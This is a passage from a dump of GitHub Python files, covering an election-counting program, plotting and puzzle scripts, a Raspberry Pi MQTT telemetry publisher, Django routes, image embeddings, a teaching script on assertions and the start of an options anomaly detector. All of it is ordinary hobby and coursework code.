Parameters\n ----------\n csv_filename : String\n A filepath to the votes data.\n candidates : list\n A list of all the candidates.\n\n Returns\n -------\n df : pd.DataFrame\n A multi-indexed, prepared, dataframe.\n\n '''\n \n #Create Column Names\n column_names = [\"Choice %s\" % (i+1) for i in range(len(candidates))]\n candidate_scores = dict([(candidate, 1) for candidate in candidates])\n \n handle_invalid_votes(csv_filename)\n \n #Read CSV\n df = pd.read_csv(csv_filename, names=column_names)\n df = df.reset_index(drop=True)\n \n #Set the Weight\n df[\"Weight\"] = 1\n \n #Convert and return a multi-index dataframe\n return df.set_index(df.columns.to_list()[:-1]).sort_index()\n\n \ndef handle_invalid_votes(csv_filename):\n '''\n This method pushes all the empty votes to the end and removes all the empty ballots.\n\n Parameters\n ----------\n csv_filename : String\n A string of the name of the csv file.\n\n '''\n file = open(csv_filename)\n file_content = file.read()\n file_rows = file_content.split('\\n')\n \n cleaned_rows = []\n for row in file_rows:\n choices = row.split(',')\n \n is_empty = True\n for choice in choices:\n if choice == '':\n choices.append(choices.pop(choices.index(choice))) \n else:\n is_empty = False\n \n if not is_empty:\n cleaned_rows.append(','.join(choices))\n \n file = open(csv_filename, 'w')\n file = file.write('\\n'.join(cleaned_rows))\n \ndef remove_invalid_votes(df):\n '''\n This method removes all the invalid votes in the first choice column.\n\n Parameters\n ----------\n df : pd.DataFrame\n A dataframe of all the votes.\n\n Returns\n -------\n df : pd.DataFrame\n A dataframe with invalid votes removed.\n\n '''\n df = undo_levels(df)\n df = df.drop(df[df['Choice 1'] != df['Choice 1']].index)\n \n return df\n\ndef run_rounds(df, num_of_winners, total_winners):\n '''\n This method retruns the total winners of the election.\n \n This method first checks if there are enough total winners. If there are, then the winners \n are returned. If there aren't, the invalid votes are removed and then it checks for a winner. If\n there is a winner, then the handle_winner(df, threshold, total_winners) method is called and then \n run_rounds(df, num_of_winners, threshold, total_winners) is called again. If there is no winner,\n then the handle_loser(df) method is called, followed by a recursive \n run_rounds(df, num_of_winners, threshold, total_winners).\n \n Parameters\n ----------\n df : pd.DataFrame\n A dataframe of all the votes.\n num_of_winners : int\n The desired amount of winners.\n total_winners : list\n A list of the winners so far.\n\n Returns\n -------\n total_winners : list\n A list of the total winners.\n\n '''\n \n df = remove_invalid_votes(df)\n\n if len(total_winners) < num_of_winners:\n \n total_votes = df.shape[0]\n threshold = math.floor(total_votes / (num_of_winners+1) + 1)\n \n if check_for_winner(df, threshold):\n df, total_winners = handle_winner(df, threshold, total_winners)\n return run_rounds(df, num_of_winners, total_winners)\n \n else:\n df = handle_loser(df)\n return run_rounds(df, num_of_winners, total_winners)\n \n return total_winners\n \n \n \ndef main(csv_filename, candidates, num_of_winners):\n '''\n This method first prepares the data, then runs the run_rounds(df, num_of_winners, total_winners)\n method and saves the total winners to a variable. The total_winners are then returned.\n\n Parameters\n ----------\n csv_filename : String\n A filepath to the votes data.\n candidates : list\n A list of all the candidates.\n num_of_winners : int\n The desired amount of winners.\n\n Returns\n -------\n total_winners : list\n The winners of the election.\n\n '''\n df = prepare_data(csv_filename, candidates)\n \n total_winners = run_rounds(df, num_of_winners, [])\n \n return total_winners\n ","repo_name":"Elliot-Gross/Election-System-Project","sub_path":"sample/Election_Project.py","file_name":"Election_Project.py","file_ext":"py","file_size_in_byte":8571,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"68"} +{"seq_id":"41526354422","text":"import matplotlib.pyplot as plt\nimport matplotlib.colors as mcolors\nimport numpy as np\n\n\nclass PlotterStrip:\n _color_list = list(mcolors.CSS4_COLORS.values())\n\n def __init__(self):\n np.random.seed(0)\n plt.axes()\n\n plt.xlabel('Ancho')\n plt.ylabel('Altura')\n\n def plot_individual_with_rotation(self, individual, heights, widths, max_width, title=\"Strip Packaging Problem - With Rotations\"):\n # Plot Variables\n plt.title(title)\n ancho_anterior = 0\n # Index rectangle variables\n i = 0\n ancho_acum = 0\n altura_max = 0\n altura_total = 0\n ancho_actual = 0\n\n for rectangulo in individual[0]:\n rectangulo = int(rectangulo)\n\n # Update Plot position\n ancho_anterior += ancho_actual\n\n # Chequeo la orientación del rectángulo\n if individual[1][i] == 0:\n ancho_actual = widths[rectangulo]\n altura_actual = heights[rectangulo]\n else:\n ancho_actual = heights[rectangulo]\n altura_actual = widths[rectangulo]\n\n if ancho_actual + ancho_acum <= max_width:\n ancho_acum += ancho_actual\n if altura_actual > altura_max:\n altura_max = altura_actual\n else:\n altura_total += altura_max\n ancho_acum = ancho_actual\n altura_max = altura_actual\n\n # Update Plot position\n ancho_anterior = 0\n i += 1\n\n # Draw rectangle\n plt.axis('scaled')\n fillColor = self._random_color()\n rectangle_to_draw = plt.Rectangle((ancho_anterior, altura_total), ancho_actual, altura_actual,\n fc=fillColor, ec='k')\n plt.gca().add_patch(rectangle_to_draw)\n\n plt.show()\n\n altura_total += altura_max\n return altura_total\n\n def plot_individual_with_no_rotation(self, individual, heights, widths, max_width,\n title=\"Strip Packaging Problem - No rotations\"):\n # Plot variables\n plt.title(title)\n ancho_anterior = 0\n ancho_actual = 0\n altura_actual = 0\n\n # Variables to index rectangles\n ancho_acum = 0\n altura_max = 0\n altura_total = 0\n\n for rectangle in individual:\n rectangle = int(rectangle)\n\n # Update Plot position\n ancho_anterior += ancho_actual\n ancho_actual = widths[rectangle]\n\n # Update heights and widths\n if widths[rectangle] + ancho_acum <= max_width:\n ancho_acum += widths[rectangle]\n if heights[rectangle] > altura_max:\n altura_max = heights[rectangle]\n else:\n altura_total += altura_max\n ancho_acum = widths[rectangle]\n altura_max = heights[rectangle]\n\n # Update Plot position\n altura_actual = altura_total\n ancho_anterior = 0\n\n # Draw rectangle\n plt.axis('scaled')\n rectangle = plt.Rectangle((ancho_anterior, altura_actual), widths[rectangle], heights[rectangle],\n fc=self._random_color(), ec='k')\n plt.gca().add_patch(rectangle)\n\n plt.show()\n\n return\n\n # Returns a random color from _color_list\n def _random_color(self):\n fill_color_index = np.random.randint(0, len(self._color_list))\n return self._color_list[fill_color_index]\n","repo_name":"meganmaguire/SPP-GA","sub_path":"Plotter.py","file_name":"Plotter.py","file_ext":"py","file_size_in_byte":3642,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"10512731145","text":"\ndef read_in_depths(file_name):\n with open(file_name) as file:\n lines = file.readlines()\n lines = [int(line.rstrip()) for line in lines]\n return lines\n\ndef count_increases(depths):\n increase_count = 0\n\n for i in range(1,len(depths)):\n increase_count = increase_count + 1 if depths[i] > depths[i - 1] else increase_count\n\n return increase_count\n\ndef apply_window_count(depths, window):\n summed_depths = []\n\n for i in range(0, len(depths) - (window-1)):\n sum = 0\n for j in range(i, i + window):\n sum = sum + depths[j]\n summed_depths.append(sum)\n \n return summed_depths\n\n#A: 1766\n#H: 1581\ndef day_one_part_one():\n depths = read_in_depths(\"data/day_one.txt\")\n return count_increases(depths)\n\n#A: 1797\n#H: 1618\ndef day_one_part_two():\n depths = read_in_depths(\"data/day_one.txt\")\n window_count_depths = apply_window_count(depths, 3)\n return count_increases(window_count_depths)\n\nprint(day_one_part_one())\nprint(day_one_part_two())\n","repo_name":"aliwen-soft/AdventOfCode2021","sub_path":"src/day1_depth_counter.py","file_name":"day1_depth_counter.py","file_ext":"py","file_size_in_byte":1029,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"24406018996","text":"#! /usr/bin/env python3\n\n# based on https://gist.github.com/Sennevds/1ff538ba80978810019af3d5da92118f\nfrom subprocess import check_output\nfrom re import findall\nimport psutil\nimport sys\nimport os\nimport threading, time, signal\nfrom datetime import timedelta\nimport datetime as dt\nimport paho.mqtt.client as mqtt\nimport pytz\nimport json\nfrom pytz import timezone\nimport logging\nfrom systemd.journal import JournalHandler\n\nlog = logging.getLogger(\"mqtt-publisher\")\nlog.addHandler(JournalHandler())\nlog.setLevel(logging.INFO)\n\n# Config\nbroker_url = os.getenv('MQTT_HOST') #MQTT server IP\ndeviceName = os.getenv('DEVICE_NAME') #Name off your PI\n\nDEFAULT_TIME_ZONE = timezone(os.getenv('TZ','Europe/Moscow'))#Local Time zone\nbroker_port = int(os.getenv('MQTT_PORT', 1883)) #MQTT server port\nbroker_user = os.getenv('MQTT_USER', '')\nbroker_pass = os.getenv('MQTT_PASS' ,'')\ntrackedMounts = os.getenv('TRACKED_MOUNTS', 'root:/')\n\nWAIT_TIME_SECONDS = int(os.getenv(\"SLEEP_TIME\", 60))\n\nPROCFS_PATH = os.getenv(\"PROC_PATH\", \"/proc\")\nMODEL_PATH = os.getenv(\"MODEL_PATH\", \"/sys/firmware/devicetree/base/model\")\nVCGENCMD = os.getenv(\"VCGENCMD\", \"vcgencmd\")\n\npsutil.PROCFS_PATH = PROCFS_PATH\n\nUTC = pytz.utc\nSYSFILE = '/sys/devices/platform/soc/soc:firmware/get_throttled'\n\nmqtt.Client.connected_flag=False\n\ndef on_connect(client, userdata, flags, rc):\n log.info(\"Connect callback RC: \" + str(rc))\n\n if rc==0:\n log.info(\"Connected\")\n client.connected_flag = True\n log.info(\"Sending initial data on connect\")\n\n configure_device()\n update_sensors()\n\n log.info(\"Sent initial data on connect\")\n else:\n log.info(\"Bad connection\")\n client.connected_flag = False\n\ndef on_disconnect(client, userdata, rc):\n log.info(\"Disconnected\") \n client.connected_flag = False\n\nclient = mqtt.Client()\nclient.username_pw_set(broker_user, broker_pass)\nclient.on_connect = on_connect \nclient.on_disconnect = on_disconnect\n\nclass ProgramKilled(Exception):\n pass\n\ndef signal_handler(signum, frame):\n client.disconnect()\n raise ProgramKilled\n\nclass Job(threading.Thread):\n def __init__(self, interval, execute, *args, **kwargs):\n threading.Thread.__init__(self)\n self.daemon = False\n self.stopped = threading.Event()\n self.interval = interval\n self.execute = execute\n self.args = args\n self.kwargs = kwargs\n \n def stop(self):\n self.stopped.set()\n self.join()\n def run(self):\n while not self.stopped.wait(self.interval.total_seconds()):\n self.execute(*self.args, **self.kwargs)\n\ndef utc_from_timestamp(timestamp: float) -> dt.datetime:\n \"\"\"Return a UTC time from a timestamp.\"\"\"\n return UTC.localize(dt.datetime.utcfromtimestamp(timestamp))\n\ndef as_local(dattim: dt.datetime) -> dt.datetime:\n \"\"\"Convert a UTC datetime object to local time zone.\"\"\"\n if dattim.tzinfo == DEFAULT_TIME_ZONE:\n return dattim\n if dattim.tzinfo is None:\n dattim = UTC.localize(dattim)\n\n return dattim.astimezone(DEFAULT_TIME_ZONE)\n\ndef get_last_boot():\n return str(as_local(utc_from_timestamp(psutil.boot_time())).isoformat())\n\ndef update_sensors():\n if not client.connected_flag:\n log.info(\"Publishing device status skipped: not connected\")\n return\n\n log.info(\"Publishing device status\")\n\n mounts = {}\n \n for pair in trackedMounts.split(\";\"):\n mountConf = pair.split(\":\")\n mountPath = mountConf[1]\n mountName = mountConf[0]\n \n mounts[mountName] = get_disk_usage(mountPath)\n\n\n client.publish(\n topic=get_state_topic(), \n payload=json.dumps({\n \"temperature\": get_temp(),\n \"disk_use\": mounts,\n \"memory_use\": get_memory_usage(),\n \"cpu_usage\": get_cpu_usage(),\n \"power_status\": get_rpi_power_status(),\n \"power_status_value\": get_rpi_power_status_value(),\n \"last_boot\": get_last_boot(),\n }),\n qos=1, retain=False\n )\n\n log.info(\"Publishing device status done\")\n\ndef get_temp():\n temp = check_output([VCGENCMD,\"measure_temp\"]).decode(\"UTF-8\")\n return str(findall(\"\\d+\\.\\d+\",temp)[0])\n\ndef get_model():\n model = check_output([\"cat\", MODEL_PATH]).decode(\"UTF-8\")\n return str(model)\n\n\ndef get_disk_usage(mountPath):\n return str(psutil.disk_usage(mountPath).percent)\n\ndef get_memory_usage():\n return str(psutil.virtual_memory().percent)\n\ndef get_cpu_usage():\n return str(psutil.cpu_percent(interval=None))\n\ndef get_rpi_power_status_value():\n _throttled = open(SYSFILE, 'r').read()[:-1]\n _throttled = _throttled[:4]\n \n return _throttled\n\ndef get_rpi_power_status():\n _throttled = get_rpi_power_status_value()\n\n if _throttled == '0':\n return 'OK'\n elif _throttled == '1000':\n return 'Undervoltage'\n elif _throttled == '2000':\n return 'Throttling due to power outage'\n elif _throttled == '3000':\n return 'Throttling due to power outage'\n elif _throttled == '4000':\n return 'Heavy throttling due to power outage'\n elif _throttled == '5000':\n return 'Heavy throttling due to power outage'\n elif _throttled == '8000':\n return 'Overheating'\n else:\n return 'Unable to get power status'\n\ndef get_state_topic():\n return \"homeassistant/sensor/\"+ deviceName +\"/state\"\n\ndef configure_device(): \n if not client.connected_flag:\n log.info(\"Publishing device config skipped: not connected\")\n return\n\n log.info(\"Publishing device config\")\n\n deviceInfo = {\n \"identifiers\": [deviceName],\n \"name\": deviceName,\n \"manufacturer\": \"Raspberry PI Foundation\",\n \"model\": get_model()\n }\n \n client.publish(\n topic=\"homeassistant/sensor/\"+ deviceName +\"/temperature/config\", \n payload=json.dumps({\n \"unique_id\": deviceName + \"_temperature\",\n \"device\": deviceInfo,\n \"name\": deviceName + \" Temperature\",\n \"icon\": \"mdi:coolant-temperature\",\n \"state_topic\": get_state_topic(),\n \"device_class\": \"temperature\",\n \"unit_of_measurement\": \"°C\", \n \"value_template\": \"{{ value_json.temperature}}\",\n \"enabled_by_default\": True,\n }, default=dumper), qos=1, retain=True\n )\n\n for pair in trackedMounts.split(\";\"):\n mountConf = pair.split(\":\")\n mountPath = mountConf[1]\n mountName = mountConf[0]\n\n client.publish(\n topic=\"homeassistant/sensor/\"+ deviceName +\"/disk_usage_\"+mountName+\"/config\", \n payload=json.dumps({\n \"unique_id\": deviceName + \"_disk_usage_\" + mountName,\n \"device\": deviceInfo,\n \"name\": deviceName + \" Disk Usage (\" + mountName + \")\",\n \"icon\": \"mdi:harddisk\",\n \"state_topic\": get_state_topic(),\n \"unit_of_measurement\": \"%\", \n \"value_template\": \"{{ value_json.disk_use.\"+mountName+\"}}\",\n \"enabled_by_default\": True,\n }, default=dumper), qos=1, retain=True\n )\n \n client.publish(\n topic=\"homeassistant/sensor/\"+ deviceName +\"/memory_usage/config\", \n payload=json.dumps({\n \"unique_id\": deviceName + \"_memory_usage\",\n \"device\": deviceInfo,\n \"name\": deviceName + \" Memory Usage\",\n \"icon\": \"mdi:memory\",\n \"state_topic\": get_state_topic(),\n \"unit_of_measurement\": \"%\", \n \"value_template\": \"{{ value_json.memory_use}}\",\n \"enabled_by_default\": True,\n }, default=dumper), qos=1, retain=True\n )\n\n client.publish(\n topic=\"homeassistant/sensor/\"+ deviceName +\"/cpu_usage/config\", \n payload=json.dumps({\n \"unique_id\": deviceName + \"_cpu_usage\",\n \"device\": deviceInfo,\n \"name\": deviceName + \" Cpu Usage\",\n \"icon\": \"mdi:cpu-64-bit\",\n \"state_topic\": get_state_topic(),\n \"unit_of_measurement\": \"%\", \n \"value_template\": \"{{ value_json.cpu_usage}}\",\n \"enabled_by_default\": True,\n }, default=dumper), qos=1, retain=True\n )\n\n client.publish(\n topic=\"homeassistant/sensor/\"+ deviceName +\"/power_status/config\", \n payload=json.dumps({\n \"unique_id\": deviceName + \"_power_status\",\n \"device\": deviceInfo,\n \"name\": deviceName + \" Power Status\",\n \"icon\": \"mdi:power-plug\",\n \"state_topic\": get_state_topic(),\n \"value_template\": \"{{ value_json.power_status}}\",\n \"enabled_by_default\": True,\n }, default=dumper), qos=1, retain=True\n )\n\n client.publish(\n topic=\"homeassistant/sensor/\"+ deviceName +\"/power_status_value/config\", \n payload=json.dumps({\n \"unique_id\": deviceName + \"_power_status_value\",\n \"device\": deviceInfo,\n \"name\": deviceName + \" Power Status (Numeric)\",\n \"icon\": \"mdi:power-plug\",\n \"state_topic\": get_state_topic(),\n \"value_template\": \"{{ value_json.power_status_value}}\",\n \"enabled_by_default\": True,\n }, default=dumper), qos=1, retain=True\n )\n\n client.publish(\n topic=\"homeassistant/sensor/\"+ deviceName +\"/last_boot/config\", \n payload=json.dumps({\n \"unique_id\": deviceName + \"_last_boot\",\n \"device\": deviceInfo,\n \"name\": deviceName + \" Last Boot\",\n \"icon\": \"mdi:clock\",\n \"state_topic\": get_state_topic(),\n \"device_class\": \"timestamp\",\n \"value_template\": \"{{ value_json.last_boot}}\",\n \"enabled_by_default\": True,\n }, default=dumper), qos=1, retain=True\n )\n\n log.info(\"Publishing device config done\")\n\ndef dumper(obj):\n try:\n return obj.toJSON()\n except:\n return obj.__dict__\n\nif __name__ == \"__main__\":\n log.info(\"Initializing signals\")\n\n signal.signal(signal.SIGTERM, signal_handler)\n signal.signal(signal.SIGINT, signal_handler)\n\n log.info(\"Trying to connect: host \" + str(broker_url) + \" port \" + str(broker_port))\n\n client.connect(broker_url, port=broker_port, keepalive=60)\n \n log.info(\"Continue configuration\")\n\n device = Job(interval=timedelta(seconds=60 * 10), execute=configure_device)\n sensors = Job(interval=timedelta(seconds=WAIT_TIME_SECONDS), execute=update_sensors)\n\n device.start()\n sensors.start()\n\n log.info(\"Jobs started\")\n log.info(\"Starting loop\")\n\n client.loop_forever()\n \n while True:\n try:\n time.sleep(1)\n except ProgramKilled:\n log.info(\"Stopping\")\n sys.stdout.flush()\n device.terminate()\n sensors.terminate()\n break\n \n","repo_name":"scaytrase/vgencmd-mqtt-publisher","sub_path":"publisher.py","file_name":"publisher.py","file_ext":"py","file_size_in_byte":10880,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"3973715117","text":"class Cage:\n \"\"\"This class describe one cell\"\"\"\n temperature = None\n material = None\n mass = None\n upd_q = None\n saved_q = None\n dx = 10 ** (-3)\n S = 10 ** (-6)\n t_0 = 10 ** (-3)\n\n def interaction(self, *cell_list):\n for i in range(len(cell_list)):\n self.upd_q += 0.5 * (self.material.conductivity + cell_list[i].material.conductivity) * (\n self.temperature - cell_list[i].temperature) / Cage.dx * Cage.t_0 * Cage.S\n if round(self.temperature, 1) == self.material.trans_temperature and self.material != cell_list[i].material:\n self.saved_q += abs(self.upd_q) * 10\n self.upd_q = 0\n if self.saved_q >= self.material.fusion * self.mass:\n self.material = cell_list[i].material\n self.saved_q = 0\n\n def change_temp(self):\n self.temperature -= self.upd_q / (self.material.capacity * self.mass)\n self.upd_q = 0\n\n def __init__(self, temperature=None, material=None):\n self.temperature = temperature\n self.material = material\n self.mass = material.density * Cage.S * Cage.dx\n self.upd_q = 0\n self.saved_q = 0\n\n","repo_name":"kirillis/ice-project","sub_path":"Cell_version_2/Test_Cage.py","file_name":"Test_Cage.py","file_ext":"py","file_size_in_byte":1204,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"41035714662","text":"import os\n\nimport pandas as pd\nimport torch\nimport transformers\nfrom PIL import Image\nfrom tqdm.contrib import tzip\nfrom transformers import AutoImageProcessor, AutoModel\n\ntransformers.logging.set_verbosity_error()\n\ndevice = \"cuda:0\" if torch.cuda.is_available() else \"cpu\"\n\ncub_200_names_file = '../shared/cub-200-folder-names.txt'\nlatin_names_file = '../shared/latin_names.txt'\n\ndata_source = 'cub-200'\n# data_source = 'botw'\n\nroot_directory = '../botw_data/MEDIA/Images' if data_source == 'botw' else '../CUB_200_2011/images'\n\n# 'microsoft/resnet-34', 'microsoft/focalnet-tiny'\nused_models = ['google/vit-base-patch16-224-in21k']\n\n\ndef readfile(path):\n with open(path, 'r') as f:\n return f.read().splitlines()\n\n\ndef store_as_csv(embedding_dict, path):\n embedding_dim = len(list(embedding_dict.values())[0])\n\n columns = [f'Neuron_{x + 1}' for x in range(embedding_dim)]\n df = pd.DataFrame.from_dict(embedding_dict, orient='index', columns=columns)\n\n df.reset_index(inplace=True)\n df.rename(columns={'index': 'species'}, inplace=True)\n\n df.to_csv(path, index=False)\n\n\ndef get_image_embeddings(image, model, preprocessor):\n image = preprocessor(images=image, return_tensors=\"pt\").to(device)\n outputs = model(**image)\n\n return outputs.pooler_output.squeeze().detach().cpu().numpy()\n\n\ndef get_mean_embeddings(model, preprocessor, root_dir, folder_names, save_names):\n mean_embeddings = {}\n\n for folder, save_name in tzip(folder_names, save_names):\n subdirectory = os.path.join(root_dir, folder)\n class_files = os.listdir(subdirectory)\n\n class_embeddings = []\n\n for img_path in class_files:\n file_path = os.path.join(subdirectory, img_path)\n image = Image.open(file_path).convert('RGB')\n\n embedding = get_image_embeddings(image, model, preprocessor)\n\n class_embeddings.append(embedding)\n\n mean_embedding = sum(class_embeddings) / len(class_embeddings)\n\n mean_embeddings[save_name] = mean_embedding\n\n return mean_embeddings\n\n\nlatin_names = readfile(latin_names_file)\nfolder_names = readfile(latin_names) if data_source == 'botw' else readfile(cub_200_names_file)\n\nfor model_name in used_models:\n proc = AutoImageProcessor.from_pretrained(model_name)\n mod = AutoModel.from_pretrained(model_name).to(device)\n\n class_reps = get_mean_embeddings(mod, proc, root_directory, folder_names, latin_names)\n store_as_csv(class_reps, f'Image/{model_name.replace(\"/\", \"-\").split(\"-\")[1]}-{data_source}.csv')\n","repo_name":"hubanton/Cub-200-Scripts","sub_path":"Embeddings/image-embeddings.py","file_name":"image-embeddings.py","file_ext":"py","file_size_in_byte":2534,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"42168583889","text":"#-*- coding:utf-8 -*-\r\nfrom django.conf.urls import patterns, include, url\r\nfrom view.view import v_index,v_help,v_test\r\nfrom app.userApp.views import v_logout,v_register,v_visit\r\nfrom app.activityApp.views import v_create\r\nfrom app.qrcodeApp.utils import qr_per\r\n\r\n#API接口\r\n#from view.api import api_login\r\n# Uncomment the next two lines to enable the admin:\r\n\r\nfrom django.contrib import admin\r\nadmin.autodiscover()\r\n\r\nurlpatterns = patterns('',\r\n url(r'^$',v_index),\r\n url(r'^myspace/',include('app.userApp.urls')),\r\n url(r'^u(\\d+)/$',v_visit),\r\n url(r'^show/',include('app.activityApp.urls')),\r\n url(r'^friend/',include('app.friendApp.urls')),\r\n url(r'^create/$',v_create,name=\"activity_create\"),\r\n url(r'^login/$', 'django.contrib.auth.views.login', \\\r\n {'template_name': 'login.tpl'}, name='logon'),\r\n url(r'^logout/$',v_logout),\r\n url(r'^help/$',v_help),\r\n url(r'^register/$',v_register,name=\"register\"),\r\n #test\r\n url(r'^test/$',v_test),\r\n\r\n url(r'^static/qrcode',qr_per),\r\n# url(r'^rejson/$',rejson),\r\n # Examples:\r\n # url(r'^$', 'Aike.views.home', name='home'),\r\n # url(r'^Aike/', include('Aike.foo.urls')),\r\n\r\n # Uncomment the admin/doc line below to enable admin documentation:\r\n # url(r'^admin/doc/', include('django.contrib.admindocs.urls')),\r\n\r\n # Uncomment the next line to enable the admin:\r\n url(r'^admin/', include(admin.site.urls)),\r\n)\r\n\r\n#API请求\r\nurlpatterns += patterns('',\r\n #用于登陆\r\n url(r'^api/',include('app.apiApp.urls')),\r\n )\r\n","repo_name":"Linktime/Aike","sub_path":"Aike/urls.py","file_name":"urls.py","file_ext":"py","file_size_in_byte":1550,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"31819936004","text":"import pandas as pd\nimport streamlit as st\nfrom aspectBasedSentimentAnalysis import AspectSentimentAnalyzer\nfrom constants import ASPECTS, FILENAME\n\n\nraw_data = pd.read_csv(FILENAME)\nanalyzer = AspectSentimentAnalyzer()\n\ndef get_rank_list(options): # the options are sensitive to order\n # call model to get the ranks\n # input: ordered aspects\n # output: ranked object ids\n objects = analyzer.get_ranking_by_aspect(options)\n # st.dataframe(objects)\n return objects\n\ndef display_ranked_list(objects):\n # inputs: object ids\n # outputs: dataframe for display\n display_cols = [\"Clothing ID\",\"Rating\",\"Positive Feedback Count\", \"Division Name\",\"Department Name\",\"Class Name\", \"combined_score\"]\n show_data = objects.merge(raw_data, how='inner')[display_cols] \\\n .groupby(\"Clothing ID\", as_index=False) \\\n .agg({\"Rating\": \"mean\", \"Positive Feedback Count\": \"mean\", \"Division Name\": \"unique\", \"Department Name\": 'unique', 'Class Name':'unique', \"combined_score\": \"unique\"}) \\\n .sort_values(by='combined_score', ascending=False)\n return show_data.set_index(\"Clothing ID\")\n\nclass SemanticCompare:\n def build_title(self):\n return st.title(\"Guess What You Like\")\n def build_input(self, options):\n sentences = get_rank_list(options)\n display = display_ranked_list(sentences)\n return st.dataframe(display)\n\nclass SemanticComparePage:\n def build(self):\n compare = SemanticCompare()\n compare.build_title()\n options = st.multiselect(\n \"Select the aspects you care the most:\",\n ASPECTS,\n ['color', 'comfortable']\n )\n compare.build_input(options=options)\n\npage = SemanticComparePage()\npage.build()\n","repo_name":"glorialy/CourseProject","sub_path":"src/review_ui.py","file_name":"review_ui.py","file_ext":"py","file_size_in_byte":1749,"program_lang":"python","lang":"en","doc_type":"code","dataset":"github-code","pt":"53"} +{"seq_id":"9283966046","text":"# -*- coding: utf-8 -*-\n\"\"\"\nProgramming Management\n\n- Introduction to Assertions\n- Fixing and debugging some code examples.\n\"\"\"\n\n# ASSERTIONS - a way to do DEFENSIVE PROGRAMMING\n\nnumbers = [1.5, 2.3, 0.7, -0.001, 4.4]\n\ntotal = 0.0\nfor num in numbers:\n assert num > 0.0, 'Data should only contain positive values'\n total += num\nprint('total is', total)\n\n\n\n# example of an assertion in a function\ndef calc_bulk_density(mass, volume):\n '''Return dry bulk density = poweder mass / powder volume.'''\n assert volume > 0, 'Problem with volume data'\n assert mass > 0, 'Problem with mass data'\n return mass / volume\n\n\n\ncalc_bulk_density(210, 0)\n\n\n\n\n\n\n## HELP ME WITH THIS CODE:\n \ndef sort_for_middle(a,b,c):\n '''Return the middle value of three\n Assumes that the values can actually be compared\n Usage: sort_for_middle(a,b,c). input three values\n '''\n values = [a,b,c]\n values.sort()\n return values[0]\n\nhelp(sort_for_middle)\n\nsort_for_middle(4,3,2)\n\n\n\n\n\n\n### CLEAN UP THIS CODE.\n\n# Read this program and try to predict what it does\n# Run it: how accurate was your prediction?\n# Refactor the program to make it more readable.\n\nn = 10\ns = 'et cetera et cetera'\nprint(s)\n\ni = 0\nwhile i < n :\n #print('at', j)\n new = ''\n for j in range(len(s)):\n left = j-1\n right = (j+1)%len(s)\n if s[left]==s[right]: \n new += \"-\"\n else: \n new += \"*\"\n s=''.join(new)\n print(s)\n i += 1 # shortcut i = i + 1\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n","repo_name":"DeisData/python","sub_path":"archived/python-session7.py","file_name":"python-session7.py","file_ext":"py","file_size_in_byte":1514,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"53"} +{"seq_id":"74112092008","text":"import numpy as np\r\nimport pandas as pd\r\nimport itertools\r\n\r\n\r\nclass anomalyDetector:\r\n def __init__(self):\r\n self._atm_delta = [0.4,0.6]\r\n self._otm_delta = 0.4\r\n self._itm_delta = 0.6\r\n\r\n self._params = None\r\n self._thresh_dic =None\r\n self._train_contract = None\r\n self._train_outlier = None\r\n self._test_contract = None\r\n self._test_outlier = None\r\n self._train_performance = None\r\n self._test_performance = None\r\n\r\n def compile(self, _type=None, expiry=None, monthly=None, moneyness=None, params=None):\r\n self._type = _type\r\n self._expiry = expiry\r\n self._monthly = monthly\r\n self._moneyness = moneyness\r\n self.set_params(params)\r\n\r\n def set_params(self, params):\r\n self._thresh_dic = {'volume':np.arange(1,3.1,0.1), 'pcratio':np.arange(0.5,1.6,0.1),\r\n 'impliedvol':np.arange(0,1,0.1), 'openinterest':np.arange(1,3.1,0.1)}\r\n assert set(params['variable']).issubset(set(self._thresh_dic.keys())), 'invalid variable name'\r\n self._params = params\r\n self._thresh_dic = {k:self._thresh_dic[k] for k in params['variable']}\r\n\r\n def fit(self, train, win_thresh):\r\n self._train_contract = self.signal_contract(train)\r\n self._train_performance = self.optimize_threshold(win_thresh)\r\n \r\n def predict(self, test, win_thresh, param_thresh, verbose):\r\n self._test_contract = self.signal_contract(test)\r\n self._test_outlier = self.anomaly_dates(self._test_contract, param_thresh)\r\n test_perform = self.outlier_impact(self._test_contract, self._test_outlier, win_thresh=win_thresh, verbose=False)\r\n self._test_performance = self.record_to_df([[*test_perform, param_thresh]])\r\n if verbose:\r\n return self.outlier_impact(self._test_contract, self._test_outlier, win_thresh=win_thresh, verbose=verbose)\r\n \r\n\r\n def evaluate(self, winprob=0.7, topn=1):\r\n #get top 1 winning probability entries in each group\r\n performance = self._train_performance\r\n temp = performance[(performance['outliernum']>1) & (performance['winprob']>winprob)]\r\n temp = temp.sort_values(['outliernum','winprob'],ascending=[False,False]).groupby('outliernum').head(topn)\r\n return temp\r\n \r\n def signal_contract(self, df):\r\n \"\"\"\r\n filter out contracts that act as outlier detectors\r\n \"\"\"\r\n df = self.preprocess(df)\r\n cond = self.type_contract(df) & self.expiry_contract(df) & self.monthly_contract(df) & self.moneyness_contract(df)\r\n return df[cond]\r\n\r\n def anomaly_dates(self, df, thresh):\r\n \"\"\"\r\n return dates in which variables exceed threshold\r\n \"\"\"\r\n grouped = df.groupby('quotedate')\r\n conditions = []\r\n variable = self._params['variable']\r\n direction = self._params['direction']\r\n window = self._params['window']\r\n volume_operation = self._params['volume_operation']\r\n log_trans = self._params['log_trans']\r\n \r\n for i, v in enumerate(variable):\r\n if v=='volume':\r\n vol_series = grouped['volume'].agg(volume_operation)\r\n vol_series[vol_series==0] = 0.01\r\n if log_trans: vol_series = np.log(vol_series)\r\n vol_rollingmean = vol_series.rolling(window).mean().shift()\r\n vol_rollingstd = vol_series.rolling(window).std().shift()\r\n vol_thresh = vol_rollingmean + vol_rollingstd*thresh[i]\r\n cond = pd.eval('vol_series' + direction[i] + 'vol_thresh') \r\n \r\n if v=='pcratio':\r\n pcr = grouped['pcratio'].first()\r\n cond = 